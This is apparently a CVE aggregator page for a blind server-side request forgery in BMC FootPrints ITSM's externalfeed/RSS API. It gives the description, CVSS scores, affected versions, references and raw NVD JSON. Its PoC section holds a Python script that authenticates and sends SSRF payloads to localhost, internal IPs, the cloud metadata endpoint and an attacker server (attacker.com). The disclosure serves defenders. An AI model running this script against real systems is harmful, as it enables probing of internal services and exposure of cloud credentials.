CVE-2025-71259

Description

BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the externalfeed/RSS API component that allows authenticated attackers to trigger arbitrary outbound requests from the server. Attackers can exploit insufficient validation of externally supplied resource references to interact with internal services or cause resource exhaustion impacting availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:* - VULNERABLE

BMC FootPrints ITSM 20.20.02

BMC FootPrints ITSM 20.20.03.002之前版本

BMC FootPrints ITSM 20.21.01.001之前版本

BMC FootPrints ITSM 20.21.02.002之前版本

BMC FootPrints ITSM 20.22.01

BMC FootPrints ITSM 20.22.01.001之前版本

BMC FootPrints ITSM 20.23.01

BMC FootPrints ITSM 20.23.01.002之前版本

BMC FootPrints ITSM 20.24.01之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-71259 BMC FootPrints ITSM Blind SSRF PoC
# Target: externalfeed/RSS API endpoint
# Authentication required (low-privilege user)

def exploit_ssrf(target_url, attacker_server, credentials):
    """
    Exploit blind SSRF in BMC FootPrints ITSM externalfeed/RSS API
    
    Args:
        target_url: Base URL of BMC FootPrints ITSM (e.g., https://target.com)
        attacker_server: Attacker's controlled server to receive requests
        credentials: Dict with 'username' and 'password'
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege account
    login_url = f"{target_url}/GoIn/LogIn.dll?R=1"
    login_data = {
        'username': credentials['username'],
        'password': credentials['password']
    }
    
    print(f"[*] Authenticating as {credentials['username']}...")
    response = session.post(login_url, data=login_data)
    
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Exploit SSRF via externalfeed/RSS API
    ssrf_url = f"{target_url}/externalfeed/RSS"
    
    # Internal service probing (SSRF payload examples)
    payloads = [
        f"http://localhost:80/",
        f"http://127.0.0.1:8080/",
        f"http://169.254.169.254/latest/meta-data/",  # Cloud metadata
        f"http://{attacker_server}/",
        f"http://192.168.1.1:80/"
    ]
    
    print(f"[*] Sending SSRF payloads to {ssrf_url}...")
    
    for payload in payloads:
        params = {'url': payload}
        try:
            response = session.get(ssrf_url, params=params, timeout=10)
            print(f"[+] Payload sent: {payload}")
        except requests.exceptions.Timeout:
            print(f"[!] Timeout for payload: {payload} (may indicate successful SSRF)")
        except Exception as e:
            print(f"[-] Error with payload {payload}: {str(e)}")
    
    print("[*] SSRF exploitation completed")
    print("[*] Check attacker_server logs for incoming requests from target")
    return True

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-71259.py <target_url> <attacker_server> <username> <password>")
        print("Example: python cve-2025-71259.py https://footprints.example.com http://attacker.com:8080 user pass")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker = sys.argv[2]
    creds = {'username': sys.argv[3], 'password': sys.argv[4]}
    
    exploit_ssrf(target, attacker, creds)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71259
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71259
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71259/
[4] VulDB https://vuldb.com/cve/CVE-2025-71259
[5] https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/
[6] https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
[7] https://www.vulncheck.com/advisories/bmc-footprints-itsm-blind-ssrf-in-externalfeed-rss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71259", "sourceIdentifier": "[email protected]", "published": "2026-03-19T14:16:13.380", "lastModified": "2026-04-22T17:36:55.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the externalfeed/RSS API component that allows authenticated attackers to trigger arbitrary outbound requests from the server. Attackers can exploit insufficient validation of externally supplied resource references to interact with internal services or cause resource exhaustion impacting availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01."}, {"lang": "es", "value": "Las versiones 20.20.02 a 20.24.01.001 de BMC FootPrints ITSM contienen una vulnerabilidad de falsificación de petición del lado del servidor ciega en el componente API externalfeed/RSS que permite a atacantes autenticados activar peticiones salientes arbitrarias desde el servidor. Los atacantes pueden explotar la validación insuficiente de referencias de recursos suministradas externamente para interactuar con servicios internos o causar agotamiento de recursos que afecte la disponibilidad. Los siguientes hotfixes remedian la vulnerabilidad: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002 y 20.24.01."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.20.02", "versionEndIncluding": "20.24.01.001", "matchCriteriaId": "847E5686-7CB0-4A4F-952D-E3D9D2CF7BE8"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/bmc-footprints-itsm-blind-ssrf-in-externalfeed-rss", "so ... (truncated)